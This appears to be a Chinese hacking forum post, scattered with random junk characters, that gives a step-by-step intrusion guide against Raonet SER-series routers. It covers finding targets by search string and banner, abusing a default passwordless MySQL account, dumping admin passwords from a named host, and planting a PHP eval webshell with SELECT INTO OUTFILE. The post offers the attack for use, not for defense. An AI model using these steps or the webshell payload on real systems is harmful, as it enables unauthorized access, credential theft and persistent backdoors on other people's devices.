寻找存在漏洞的路由器方法:9 V4 w9 |# N9 d. T
4 U5 X( k4 ]/ q+ r$ O- A& `1:google搜索'Raonet Subscriber Ethernet Router'
7 n* _, t7 S4 W7 }9 R( h/ l8 t3 @7 e. a
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# u/ }: I" e6 s( |! D& U' s V5 c1 w6 N! z! u- |2 ~2 a4 d8 m/ z
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。 z! \' d% a4 F6 _/ H
5 e1 T7 }6 u8 z+ N2 E9 l//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......- u( G* F; m* Q9 q
# {$ Z, p+ q( ?5 n / Y( z: J" H u7 [
/ y( ]: s2 f( K5 r4 x
入侵步骤:
, R0 j! |0 k M, s) J' ~6 Y2 o/ c" n! X, C. s8 y& a0 t0 Y n$ v
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
# g; J3 o' C7 G/ R8 o4 z7 q- \4 z8 q6 s1 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc2 [3 i8 W6 m# j, @, S" K* a
3:得到密码后连接,查看GUI管理密码:9 P, R V! J3 ]- e- C4 |$ ]+ o
use ser_500
0 D6 D# h& o- hselect id,passwd from user;
! z# _. m: _, T- Y4 R/ _4:通过数据库写入webshell,执行命令:1 }$ K: N9 r* I; F
use mysql;
* N0 q% C3 }8 `2 J# T! ?create table ok(cmd TEXT);
/ p; `+ \2 e& ]insert into ok values("<?php @eval($_POST[cmd])?>");: X& R. I. a6 ~
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";8 T8 j7 k; Q, u
drop table ok;
" O Z$ G$ M1 |1 }* |: q) a. k2 l3 I6 f$ ~4 e" ^5 L$ u
5:连接后门shell.php % G0 Q K( i6 a3 H2 h$ g: Q
% q5 G$ l9 H; d! B4 W- R" G* A% B
6. 搞定!% Y, A6 X, S2 \* w0 j8 y/ [
+ Z; P. J, k! i6 l6 u |